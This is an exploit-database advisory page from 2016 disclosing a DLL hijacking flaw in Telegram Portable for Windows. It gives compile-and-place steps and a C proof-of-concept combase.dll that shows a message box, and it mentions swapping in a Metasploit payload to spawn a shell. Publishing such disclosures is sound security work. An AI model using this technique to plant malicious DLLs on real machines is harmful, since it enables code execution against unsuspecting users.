Telegram Portable DLL Hijacking (combase.dll )

2016.08.29
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: Telegram Portable DLL Hijacking (combase.dll ) # Date: 29-8-2016 # Author: Ashiyane Digital Security Team # Vendor Homepage: https://telegram.org/ # Software Link: https://telegram.org/dl/desktop/win_portable # Tested on: Windows 7 ####################################################################################### Vuln DLL: combase.dll Telegram.exe will search for an load any DLL named "combase.dll". If an attacker can place the DLL in a location where victim open Telegram.exe it will load and run the attackers DLL and code. also can generate a msfpayload DLL and spawn a shell, for example. ####################################################################################### Exploit : 1- Save and compile below C code as 'combase.dll' to create vuln DLL 2- Place 'combase.dll' on remote share or other directory like "downloads" 3- Open Telegram.exe :DLL //gcc test.c -o combase.dll -shared //this dll show a message box #include <windows.h> #define DllExport __declspec (dllexport) BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { dll_hijack(); return 0; } int dll_hijack() { MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK); return 0; } ################# Discovered By : Amir.ght #################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top